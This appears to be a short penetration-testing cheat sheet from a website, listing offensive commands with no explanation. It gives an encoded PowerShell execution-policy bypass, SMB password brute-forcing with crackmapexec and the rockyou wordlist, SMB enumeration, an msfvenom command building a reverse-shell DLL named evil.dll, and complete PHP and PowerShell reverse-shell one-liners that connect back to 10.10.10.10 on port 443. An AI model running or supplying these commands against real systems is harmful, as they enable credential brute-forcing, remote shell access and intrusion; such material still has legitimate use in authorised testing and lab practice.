wfuzz, Gobuster, Dirbuster, Common files robots.txt etc. Some may even be on this site cough! cough!
powershell.exe -NoP -NonI -Exec Bypass -Enc 'awBsAGkAcwB0AA=='
crack smb with pw list:
crackmapexec smb <ip> -u 'User' -p /usr/share/wordlists/rockyou.txt
smbclient -L //<ip>/
crackmapexec smb <ip> --pass-pol -u '' -p ''
msfvenom -a x64 windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT 443 -f dll -o evil.dll
PHP: php -r '$sock=fsockopen("10.10.10.10",443);`sh <&3 >&3 2>&3`;'
Powershell: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Copyright © 2024 ill-eagle.io - All Rights Reserved.
Powered by GoDaddy